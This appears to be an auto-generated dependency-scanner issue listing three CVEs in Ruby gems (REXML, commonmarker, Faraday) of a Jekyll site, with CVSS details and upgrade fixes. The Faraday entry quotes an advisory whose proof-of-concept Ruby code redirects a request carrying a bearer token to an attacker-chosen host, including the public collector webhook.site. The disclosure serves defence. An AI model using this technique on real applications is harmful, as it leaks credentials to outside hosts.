Step up your Open Source Security Game with Mend here

CVE-2024-39908

Vulnerable Library - rexml-3.2.5.gem

An XML toolkit for Ruby

Library home page: https://rubygems.org/gems/rexml-3.2.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/rexml-3.2.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-theme-modernist-0.2.0.gem
      • jekyll-seo-tag-2.8.0.gem
        • jekyll-3.9.2.gem
          • kramdown-2.3.2.gem
            • rexml-3.2.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

REXML is an XML toolkit for Ruby. The REXML gem before 3.3.1 has some DoS vulnerabilities when it parses an XML that has many specific characters such as <, 0 and %>. If you need to parse untrusted XMLs, you many be impacted to these vulnerabilities. The REXML gem 3.3.2 or later include the patches to fix these vulnerabilities. Users are advised to upgrade. Users unable to upgrade should avoid parsing untrusted XML strings.

Publish Date: 2024-07-16

URL: CVE-2024-39908

CVSS 3 Score Details (4.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-4xqq-m2hx-25v8

Release Date: 2024-07-16

Fix Resolution: rexml - 3.3.2

Step up your Open Source Security Game with Mend here

CVE-2023-22483

Vulnerable Library - commonmarker-0.23.5.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.23.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/commonmarker-0.23.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-commonmark-ghpages-0.2.0.gem
      • commonmarker-0.23.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. Versions prior to 0.29.0.gfm.7 are subject to several polynomial time complexity issues in cmark-gfm that may lead to unbounded resource exhaustion and subsequent denial of service. Various commands, when piped to cmark-gfm with large values, cause the running time to increase quadratically. These vulnerabilities have been patched in version 0.29.0.gfm.7.

Publish Date: 2023-01-23

URL: CVE-2023-22483

CVSS 3 Score Details (3.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Adjacent
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://osv.dev/vulnerability/RSEC-2023-8

Release Date: 2023-01-23

Fix Resolution: commonmark - 1.9.2

Step up your Open Source Security Game with Mend here

CVE-2026-33637

Vulnerable Library - faraday-2.5.2.gem

Library home page: https://rubygems.org/gems/faraday-2.5.2.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/faraday-2.5.2.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-gist-1.5.0.gem
      • octokit-4.25.1.gem
        • faraday-2.5.2.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Summary "Faraday::Connection#build_exclusive_url" still allows protocol-relative host override when the request target is provided as a "URI" object instead of a "String". This bypasses the February 2026 fix for "GHSA-33mh-2634-fwr2" and can redirect a request built from a fixed-base "Faraday::Connection" to an attacker-controlled host while preserving connection-scoped headers such as "Authorization". Affected Component - Repository File(s)/Endpoint(s): - "lib/faraday/connection.rb" - "lib/faraday/request.rb" - "spec/faraday/connection_spec.rb" - "spec/faraday/request_spec.rb" - Function(s): - "Faraday::Connection#build_exclusive_url" - "Faraday::Connection#run_request" - "Faraday::Request#url" - "Faraday::Request#to_env" - Version(s) Tested: - "Faraday 2.14.1" - repository HEAD "a01039c948d3e9e41e03d152aed7244f0fb4d5ca" Attacker Profile - Who: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection - Access Required: Ability to supply data that the application converts to "URI.parse(...)" and passes to "conn.get(...)", ""conn.post" (http://conn.post/)(...)", or "req.url(...)" - Capability: Control over a protocol-relative URI such as "URI("//evil.example/pwn")" Steps to Reproduce 1. Use the current repository checkout and load Faraday from "lib/". 2. Build a fixed-base connection and provide a protocol-relative "URI" object to "req.url". 3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host. 4. Observe that the connection-scoped "Authorization" header remains attached to the off-host request. Verification Evidence - Environment: macOS, Ruby from local environment, Faraday "2.14.1", "faraday-net_http", local WEBrick listener on "127.0.0.1:4567", HEAD "a01039c948d3e9e41e03d152aed7244f0fb4d5ca" - Commands executed: $ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start' $ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body' - PoC code (inline): require "faraday" require "faraday/net_http" conn = Faraday.new(url: "http://trusted.example/base", headers: { "Authorization" => "Bearer secret-token" }) { |f| f.adapter :net_http } target = ["//127.0.0.1:4567", "/pwn"].join resp = conn.get(URI(target)) puts resp.status puts resp.body - Exit code: "0" - stdout (relevant excerpt): 200 host=127.0.0.1 auth=Bearer secret-token path=/pwn - stderr (relevant excerpt): N/A - Artifacts: none Additional External Confirmation The issue was also independently reproduced against a public HTTP collector on Faraday "2.14.1" using the default "net_http" adapter: require "faraday" require "faraday/net_http" conn = Faraday.new( url: "http://trusted.example/base", headers: { "Authorization" => "Bearer secret-token" } ) { |f| f.adapter :net_http } target = ["//webhook.site", "/"].join resp = conn.get(URI(target)) resp.status => 200 resp.url.host => "webhook.site" This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage. Supporting Materials - Existing advisory for the original string-based issue: "GHSA-33mh-2634-fwr2" - Existing CVE for the original string-based issue: "CVE-2026-25765" - Existing regression tests for the string-only fix: - "spec/faraday/connection_spec.rb:314-345" - Existing test proving supported "URI" request input: - "spec/faraday/request_spec.rb:26-31" Impact The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

Publish Date: 2026-05-18

URL: CVE-2026-33637

CVSS 3 Score Details (0.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-5rv5-xj5j-3484

Release Date: 2026-05-18

Fix Resolution: faraday - 2.14.2

Step up your Open Source Security Game with Mend here

Metadata

Metadata

Assignees

No one assigned

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions